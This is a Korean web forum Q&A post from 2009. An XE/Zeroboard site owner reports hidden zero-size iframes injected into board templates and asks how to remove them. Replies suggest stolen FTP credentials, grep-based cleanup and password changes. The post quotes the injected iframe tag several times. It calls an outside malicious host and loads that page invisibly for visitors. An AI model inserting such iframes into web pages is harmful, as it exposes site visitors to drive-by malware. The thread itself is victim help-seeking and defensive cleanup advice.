묻고답하기
iframe 침입 당했는데요.
2009.08.07 13:17
안녕하세요.
xe로 제작한 대부분의 페이지에 iframe 코드가 침입했습니다.
그래서..수많은 페이지에
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
라는 코드가 삽입되었습니다. 대충 어떻게 해서 찾긴 했는데... 게시판관련 파일에 꼭 숨어있는 이것들을
어디서 삭제해야할지 막막해서요.
웹상에서 소스를 열어보면
<!-- 게시판 정보 -->
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<div class="viewDocument">
<!-- 글 내용 보여주기 -->
이렇게 하나
그리고
이렇게 사이에 하나
<!-- 엮인글 목록 -->
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<!-- 댓글 -->
이렇게
또
<!-- 에디터 활성화 -->
<script type="text/javascript">//<![CDATA[
var editor_path = "./modules/editor/skins/xpresseditor/";
var auto_saved_msg = "Automatically Saved";
var oEditor = editorStart_xe("1", "comment_srl", "content", "120", "", "default",'','');
//]]></script>
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></div>
</div>
<div class="commentButton tRight">
<span class="button "><input type="submit" value="Add Comment" accesskey="s" /></span>
</div>
</form>
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
</div>
<!-- 목록 출력 -->
그리고
<!-- 글쓰기, 목록 버튼 --> 바로 위에 이런식으로
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<div class="boardBottom">
<!-- 글쓰기, 목록 버튼 -->
또
<!-- 하단 텍스트 출력 --> 바로 아래 부분에 이렇게
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://reycross.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td>
들어가있습니다. 이놈을 도대체 어떻게 해야 다 지울 수 있을까요?
어떤 파일을 고쳐야할지.. 이거 소스만 뜯어봐서는 찾기가 힘드네요..
제로보드 파일들을 다시 다 업로드해보았지만 증상은 똑같은거 같습니다.
끝까지 읽어주셔서 감사합니다.
댓글 3
-
바이블인사이드
2009.08.07 13:25
-
팩토리
2009.08.07 13:25
FTP 비번같은거 다른 사람에게 돌리셨어요? -
개돌
2009.08.07 13:44
호스팅 업체의 해당 서버가 해킹 당했을 가능성도 있습니다.
그 경우 같은 서버에서 서비스 중인 다른 사람들의 홈페이지도 해킹 당했을 거에요.
요즘 저거 유행인줄 아시죠? 제가 알려드릴게요
보통 인덱스나 메인으로 시작되는 파일에 칩입하는 유형인데요
최근에 ftp비번을 변경하지 않으셨거나 백신점검을 소홀히 하는 피시들에게 종종 걸리죠
님의 피시의 ftp정보가 유출이 되어서 일어나는 일종의 해킹입니다.
크게 염려하지 않으셔도 되구요
일단 쉘에서 최상위폴더로 가셔서요
grep -r reycross *
이렇게 하시면 감염된 파일들이 검색될겁니다. 그렇게 많지는 않을거예요
수작업으로 고치시구요
그리고 ftp와 db 비밀번호를 변경하세요
그리고 사용하시는 pc 백신으로 한번 돌리시구요
마지막으로 ftp 막으시구요 sftp 쓰시면 됩니다.
이것은 호스팅업체에 요청하시면 됩니다.